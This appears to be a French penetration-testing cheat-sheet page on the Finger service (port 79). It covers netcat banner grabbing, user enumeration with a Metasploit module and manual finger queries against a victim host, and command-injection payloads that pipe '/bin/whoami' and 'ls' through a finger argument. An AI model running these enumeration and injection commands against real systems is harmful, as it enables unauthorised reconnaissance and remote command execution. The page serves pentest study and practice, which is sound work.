Finger - 79

1. Infos:

Finger est un programme que vous pouvez utiliser pour trouver des informations sur les utilisateurs d'ordinateurs. Ces informations peuvent inclure l'emplacement du bureau et le numéro de téléphone, le temps de connexion, le temps d'inactivité, l'heure de la dernière lecture de ses mails, ainsi que les fichiers de l'utilisateur.

Port par défaut : 79

PORT   STATE SERVICE
79/tcp open  finger

2. Enumération

2.1 Récupération de la bannière et connexion

nc -vn <IP> 79
echo "root" | nc -vn <IP> 79

2.2 Enumération des utilisateurs

Utilisation du module metasploit :

use auxiliary/scanner/finger/finger_users

ou vous pouvez le faire à la main :

finger @<Machine_Victime> #Liste les utilisateurs
finger user1@<Machine_Victime> #Capture des infos sur l'utilisateur user1

2.3 Exécution de commandes

finger "|/bin/whoami@PILOU.com"
finger "|/bin/ls -al /@PILOU.com"

PreviousWhois - 43 NextPOP3 - 110

Last updated 3 years ago